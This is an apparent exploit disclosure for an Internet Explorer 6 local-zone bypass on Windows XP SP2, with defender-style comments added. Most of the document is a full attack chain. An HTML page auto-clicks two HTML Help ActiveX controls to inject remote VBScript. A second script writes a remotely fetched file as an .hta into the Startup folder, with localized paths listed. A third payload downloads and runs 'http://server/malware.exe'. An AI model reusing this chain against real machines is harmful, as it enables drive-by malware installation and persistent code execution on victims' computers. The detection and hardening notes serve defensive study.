IE6绕过本地验证执行漏洞

影响:Microsoft Windows XP SP2 上的 IE6

解决方法:将IE6的安全等级提升到最高。

测试:

// sp2rc.htm //

<!--
  sp2rc.htm, read from a defender's side.
  Two instances of the HTML Help ActiveX control (hhctrl.ocx, per the codebase
  attribute) are embedded, both configured with the "Related Topics" command.
  The first one, id "localpage", targets the window named $global_blank and
  its Item1 is a file:// URL to a Help Center page on the local disk (tools.htm).
  What to flag in content inspection: remote web content that instantiates this
  classid and passes "command;" items carrying file:// or javascript: URLs.
  The page's stated workaround is to raise the IE6 security level to the highest
  setting.
-->
1<object classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" codebase="hhctrl.ocx#Version=5,2,3790,1194" height="7%" id="localpage" style="position:absolute;top:140;left:72;z-index:100;" type="application/x-oleobject" width="7%">
2<param name="Command" value="Related Topics, MENU"/>
3<param name="Button" value="Text:Just a button"/>
4<param name="Window" value="$global_blank"/>
5<param name="Item1" value="command;file://C:\WINDOWS\   
6PCHealth\HelpCtr\System\blurbs\tools.htm"/>
7</object>
<!--
  Second control, id "inject": same window name ($global_blank), but Item1 is a
  javascript: URL. Its script text calls execScript to document.write a
  script element (language vbscript) whose src is http://site/writehta.txt.
  NOTE(review): since that window already holds the local file opened by
  "localpage", the written script presumably runs in the local page's security
  context instead of the Internet zone. The listing itself does not show the
  zone, so confirm against the vendor advisory.
-->
1<object classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" codebase="hhctrl.ocx#Version=5,2,3790,1194" height="7%" id="inject" style="position:absolute;top:140;left:72;z-index:100;" type="application/x-oleobject" width="7%">
2<param name="Command" value="Related Topics, MENU"/>
3<param name="Button" value="Text:Just a button"/>
4<param name="Window" value="$global_blank"/>
5<param name="Item1" value='command;javascript:   
6execScript("document.write(\"&lt;script language=\\\\\"vbscript\\\\\"   
7src=\\\\\"http://site/writehta.txt\\\\\"\"+String.fromCharCode(62)+\"   
8&lt;/scr\"+\"ipt\"+String.fromCharCode(62))")'/>
9</object>
<!--
  Trigger: HHClick() is called on "localpage" first and on "inject" 100 ms later
  through setTimeout, so the listing as shown needs no user click.
  Detection idea: script calls to HHClick() on hhctrl objects in pages that were
  served from a remote site.
-->
1<script>   
2localpage.HHClick();   
3setTimeout("inject.HHClick()",100);   
4</script>

// writehta.txt //

' writehta.txt is the VBScript referenced by the src attribute that sp2rc.htm
' writes into the help window. Read from a defender's side, it has two stages.
'
' Stage 1: open an ADODB connection through the Microsoft Text Driver. The Dbq
' value is an http:// URL, so the queried "table" (foobar.txt) presumably comes
' from a remote host rather than a local directory - TODO confirm.
Dim Conn, rs
Set Conn = CreateObject("ADODB.Connection")
Conn.Open "Driver={Microsoft Text Driver (*.txt; *.csv)};" & _
"Dbq=http://server;" & _
"Extensions=asc,csv,tab,txt;" & _
"Persist Security Info=False"
Dim sql
sql = "SELECT * from foobar.txt"
set rs = conn.execute(sql)
set rs =CreateObject("ADODB.recordset")
rs.Open "SELECT * from foobar.txt", conn
' Stage 2: persist the recordset (adPersistXML) under the All Users Startup
' folder with an .hta extension, i.e. a file intended to be launched at logon.
' Detection: creation of .hta (or any script/executable) files in a Startup
' folder by a browser or help-viewer process; ADODB.Connection and
' ADODB.Recordset being instantiated from web-delivered script.
' Hardening: the page's stated workaround is the highest IE6 security level.
rs.Save
"C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Microsoft Office.hta",
adPersistXML
' The lines below are the author's notes listing the same All Users Startup
' location on localized Windows installs. They are useful as a watch list for
' file-creation monitoring on non-English hosts.
// Spanish \Documents and Settings\All Users\Menu Inicio\Programas\Inicio\
// French \Documents and Settings\All Users\Menu D閙arrer\Programmes\D閙arrage
// Danish \Documents and Settings\All Users\Menuen Start\Programmer\Start\
// Dutch \Documents and Settings\All Users\Menu Start\Programma's\Opstarten\
// Polish \Documents and Settings\All Users\Menu Start\Programy\Autostart\
// Italian \Documents and Settings\All Users\Menu Avvio\Programmi\Esecuzione automatica\
// Finn \Documents and Settings\All Users\Kaynnista-valikko\Ohjelmat\Kaynnistys\
// Turkish \Documents and Settings\All Users\Start Menu\Programlar\BASLANGIC\ Turkish
// Norwegian \Documents and Settings\All Users\Start-meny\Programmer\Oppstart\
// Swedish \Documents and Settings\All Users\Start-menyn\Program\Autostart\
// Portuguese \Documents and Settings\All Users\Menu Iniciar\Programas\Iniciar\
// German \Dokumente und Einstellungen\All Users\Startmenu\Programme\Autostart\
' Cleanup: close the recordset, the connection and the window the script ran in.
rs.close
conn.close
window.close

// f00bar.txt //

"meaning less shit i had to put here"
"

 1<script language="vbscript"> crap = """   
 2""": on error resume next: crap = """   
 3""" : set o = CreateObject(""msxml2.XMLHTTP"") : crap="""   
 4""" : o.open ""GET"",""http://server/malware.exe"",False : crap="""   
 5""" : o.send : crap="""   
 6""" : set s = createobject(""adodb.stream"") : crap="""   
 7""" : s.type=1 : crap="""   
 8""" : s.open : crap="""   
 9""" : s.write o.responseBody : crap="""   
10""" : s.savetofile ""C:\malware.exe"",2 : crap="""   
11""" : Set ws = CreateObject(""WScript.Shell"") : crap="""   
12""" : ws.Run ""C:\malware.exe"", 3, FALSE : crap="""   
13"""</script>

crap="""
